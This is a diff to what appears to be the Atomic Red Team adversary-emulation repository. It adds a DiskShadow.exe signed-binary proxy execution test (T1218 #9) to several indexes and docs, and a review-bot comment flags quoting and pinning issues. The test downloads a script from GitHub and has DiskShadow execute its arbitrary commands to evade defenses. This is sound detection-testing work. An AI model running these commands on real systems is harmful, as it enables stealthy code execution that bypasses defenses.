diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index bb209354..9b28813f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -564,6 +564,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downlo
defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index c40f8cf5..5dfbd0e6 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -385,6 +385,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downlo
defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 6caebcb5..c91d60ec 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -886,6 +886,7 @@
- Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
+ - Atomic Test #9: DiskShadow Command Execution [windows]
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 310417c2..b46f9cd0 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -632,6 +632,7 @@
- Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
+ - Atomic Test #9: DiskShadow Command Execution [windows]
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index c5c476fe..a788ce12 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -37523,6 +37523,43 @@ defense-evasion:
command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name}
-ModulePath #{module_path}'
name: powershell
+ - name: DiskShadow Command Execution
+ auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa
+ description: 'Emulates attack with a DiskShadow.exe (LOLBIN installed by default
+ on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ txt_payload:
+ description: txt to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\T1218.txt
+ dspath:
+ description: Default location of DiskShadow.exe
+ type: Path
+ default: C:\Windows\System32\diskshadow.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: txt file must exist on disk at specified location (#{txt_payload})
+ prereq_command: 'if (Test-Path #{txt_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
+ - description: DiskShadow.exe must exist on disk at specified location (#{dspath})
+ prereq_command: 'if (Test-Path #{dspath}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'echo "DiskShadow.exe not found on disk at expected location"
+
+'
+ executor:
+ command: "#{dspath} -S #{txt_payload} \n"
+ name: powershell
+ elevation_required: false
T1216:
technique:
id: attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe
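Review bot: The executor command `#{dspath} -S #{txt_payload}` and both `Test-Path` prereq checks pass their path arguments unquoted, while the download line quotes `-OutFile "#{txt_payload}"`, so a PathToAtomicsFolder containing a space would let the download succeed but break the check and the run. Quote consistently, e.g. `if (Test-Path "#{txt_payload}") {exit 0} else {exit 1}` and `& "#{dspath}" -S "#{txt_payload}"`. `elevation_required: false` also looks doubtful, since DiskShadow is documented as needing administrator rights; if a test host confirms that, set it to `true` so a failed non-elevated run is not mistaken for missing telemetry. The get-prereq step fetches T1218.txt from the `master` branch with no hash check before the file is handed to DiskShadow, so pinning the URL to a commit or verifying a checksum would keep the executed script fixed. This file appears to be a generated index, so these changes would belong in the test's source definition rather than here.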
diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index 1c51311f..2ff65d71 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -20,6 +20,8 @@
- [Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test](#atomic-test-8---invoke-athremotefxvgpudisablementcommand-base-test)
+- [Atomic Test #9 - DiskShadow Command Execution](#atomic-test-9---diskshadow-command-execution)
+
@@ -392,4 +394,60 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+
+
+
+## Atomic Test #9 - DiskShadow Command Execution
+Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0e1483ba-8f0c-425d-b8c6-42736e058eaa
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| txt_payload | txt to execute | Path | PathToAtomicsFolder\T1218\src\T1218.txt|
+| dspath | Default location of DiskShadow.exe | Path | C:\Windows\System32\diskshadow.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+#{dspath} -S #{txt_payload}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: txt file must exist on disk at specified location (#{txt_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{txt_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
+```
+##### Description: DiskShadow.exe must exist on disk at specified location (#{dspath})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dspath}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+echo "DiskShadow.exe not found on disk at expected location"
+```
+
+
+
+